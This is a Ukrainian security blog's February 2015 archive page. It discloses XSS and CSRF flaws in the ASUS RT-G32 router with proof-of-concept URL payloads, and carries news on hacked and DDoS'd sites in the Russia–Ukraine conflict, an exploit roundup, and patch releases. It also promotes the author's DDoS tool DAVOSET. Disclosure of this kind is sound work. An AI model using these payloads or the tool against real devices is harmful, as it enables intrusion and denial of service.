Архів за Лютий, 2015

Уразливості в ASUS RT-G32

23:58 28.02.2015

У січні, 28.01.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-G32. Це перша частина дірок в RT-G32.

Раніше я писав про уразливості в Asus O!Play.

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

Дані уразливості працюють як через GET, так і через POST.

ASUS RT-G32 XSS-1.html

Cross-Site Request Forgery (WASC-09):

Зміна паролю пристрою:

ASUS RT-G32 CSRF-1.html

Уразливі всі версії ASUS RT-G32. Перевірялося в ASUS RT-G32 з прошивками версій 2.0.2.6 і 2.0.3.2.

Анонс останніх оновлень

22:46 28.02.2015

Інформую вас про останні оновлення на сайті, що були зроблені в лютому.

Торік я випустив нові версії своїх секюріті програм DAVOSET (інструмент для використання AoF та XXE уразливостей на одних сайтах для проведення DoS і DDoS атак на інші сайти) та Backdoored Web Application (еталонний тест сканерів бекдорів). А цього року я зайнявся оновленням тестів.

Сьогодні я оновив перше тестування, в якому ви можете перевірити рівень своїх знань в галузі веб безпеки. В новій версії додав 5 нових запитань. А в другому тестуванні можете перевірити рівень своїх хакерських знань.

Лютневі DDoS атаки та взломи

20:08 28.02.2015

Раніше я писав про січневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію у лютому.

В зв’язку з сепаратистськими і терористичними акціями на сході України хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Російськими хакерами були атаковані наступні сайти:

vv.gov.ua (російськими хакерами) - 15.02.2015
Twitter акаунт Stopterrorua (російськими хакерами) - 15.02.2015
www.oblrada.lviv.ua (російськими хакерами) - 17.02.2015

Іноземними хакерами були проведені неполітичні взломи:

autobaza.pz.gov.ua (хакером Cyb3r_Sw0rd) - 24.02.2015
www.dzhankoi-rada.gov.ua (хакером Nofawkx Al) - 26.02.2015

Проукраїнськими хакерами були атаковані наступні сайти:

cont.ws (Українські Кібер Війська) - 16.02.2015
Лютневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі лютого.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт iskhod.org (через скаргу хостеру) - 02.2015
Закритий сайт slavpolk.ru (через скаргу хостеру) - 02.2015
Закритий сайт novorossia-onlain.info (через скаргу хостеру) - 02.2015
Закритий сайт russiancrimea.org (через скаргу хостеру) - 02.2015
Закритий сайт antimaidan.org (через скаргу хостеру) - 02.2015
Закритий сайт dobrovolec.org (через скаргу хостеру) - 02.2015
Закритий сайт tsarov.com.ua (через скаргу хостеру) - 02.2015
Закритий сайт pro-sto.org (через скаргу хостеру) - 02.2015
Закритий сайт rusvesna.org (через скаргу хостеру) - 02.2015
Закритий сайт slav.org.ua (через скаргу хостеру) - 02.2015

Лютневий вівторок патчів від Microsoft

17:22 28.02.2015

У лютому місяці Microsoft випустила 9 патчів. Що більше ніж у січні.

У лютневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 9 бюлетенів по безпеці. Що закривають 56 уразливостей в програмних продуктах компанії. Три патчі закривають критичні уразливості та шість патчів закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Office, Internet Explorer, Office Web Apps і SharePoint Server.

Вийшов WordPress 4.1.1

22:45 27.02.2015

У лютому, 18.02.2015, вийшла нова версія WordPress 4.1.1.

WordPress 4.1.1 це багфікс випуск нової 4.1 серії. В якому розробники виправили 21 баг.

Офіційно жодних уразливостей не виправлено, лише баги. Але треба враховувати, що розробники WP полюбляють виправляти дірки приховано. Лише в 2013 році я виявив десятки приховано виправлених уразливостей в WP, про що я писав раніше.

Численні уразливості в Microsoft Office Web Apps

19:36 27.02.2015

Виявлені численні уразливості безпеки в Microsoft Office, а також в серверних продуктах Office Web Apps і SharePoint Server.

Уразливі продукти: Microsoft Office Web Apps 2010, Word Automation Services in SharePoint Server 2010.

Виконання коду, використання пам’яті після звільнення.

  • Microsoft Security Bulletin MS15-012 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (3032328) (деталі)
  • Microsoft Security Bulletin MS15-013 - Important Vulnerability in Microsoft Office Could Allow Security Feature Bypass (3033857) (деталі)

Добірка експлоітів

17:20 27.02.2015

В даній добірці експлоіти в веб додатках:

  • FancyFon FAMOC 3.16.5 Cross Site Scripting / SQL Injection Vulnerabilities (деталі)
  • ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities (деталі)
  • HP Data Protector EXEC_INTEGUTIL Remote Code Execution Exploit (деталі)
  • Joomla Akeeba Kickstart Unserialize Remote Code Execution Exploit (деталі)
  • Numara / BMC Track-It! FileStorageService Arbitrary File Upload Exploit (деталі)

Похакані сайти №287

23:53 26.02.2015

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://arhiv.zt-rada.gov.ua (хакером Nofawkx Al) - 15.12.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://mailadm.zt-rada.gov.ua (хакером Nofawkx Al) - 15.12.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://shop.alaguerre.org.ua (хакером Nofawkx Al) - 15.12.2014, зараз сайт вже виправлений адмінами
  • http://steelworkshop.kharkov.ua (хакером D3||v||EnT0r)
  • http://oto.codemotion.com.ua (хакером SWAT) - 01.02.2015, зараз сайт вже виправлений адмінами

Українські Кібер Війська: відео розвідка

22:46 26.02.2015

Українські Кібер Війська з червня займаються розвідкою. Це аудіо і відео розвідка. Раніше я наводив відео Українських Кібер Військ, що демонструють можливості Українських Кібер Військ по спостереженню за терористами.

Ось 7 нових відео, що зроблені в рамках розвідувальної операції:

Українські Кібер Війська: військова техніка в Донецьку за 29.01.2015 - УКВ записали переміщення військової техніки терористів в Донецьку.

Українські Кібер Війська: російська військова техніка в Криму за 04.02.2015 - УКВ записали переміщення військової техніки в Криму.

Українські Кібер Війська: терористи купують коштовності в Донецьку - УКВ записали покупку коштовностей в магазині Донецька.

Українські Кібер Війська: військова техніка терористів в Горлівці за 13.02.2015 - УКВ записали переміщення військової техніки терористів в Горлівці.

Українські Кібер Війська: російська військова техніка в Криму за 18-19.02.2015 - УКВ записали переміщення військової техніки в Криму.

Українські Кібер Війська: снайпери УКВ в Москві - УКВ записали відео з веб камери на багатоповерхівці в Москві.

Українські Кібер Війська: військова техніка терористів в Горлівці за 14.02.2015 - УКВ записали переміщення військової техніки терористів в Горлівці.

Вийшов Mozilla Firefox 36

20:16 26.02.2015

У лютому, 24.02.2015, вийшов Mozilla Firefox 36. Нова версія браузера вийшла через півтора місяці після виходу Firefox 35.

Mozilla офіційно випустила реліз веб-браузера Firefox 36, а також мобільну версію Firefox 36 для платформи Android. Відповідно до шеститижневого циклу розробки, реліз Firefox 37 намічений на 31 березня, а Firefox 38 на 12 травня.

Також були випущені Seamonkey 2.33 та оновлені гілки із тривалим терміном підтримки Firefox 31.5 і Thunderbird 31.5.

В цій версії додана підтримка протоколу HTTP/2.0. Серед покращень безпеки відбувся перехід до другої фази припинення підтримки сертифікатів на основі 1024-розрядних ключів RSA та був визнаний небезпечним шифр RC4.

Окремо варто відзначити, що крім нововведень і виправлення помилок у Firefox 36.0 усунуто 17 уразливостей, серед яких 3 позначені як критичні, що можуть привести до виконання коду зловмисника при відкритті спеціально оформлених сторінок. Причому ця кількість - це саме патчі (Mozilla типово виправляє по декілька дір за один патч).

  • Релиз Firefox 36 с поддержкой HTTP/2.0 (деталі)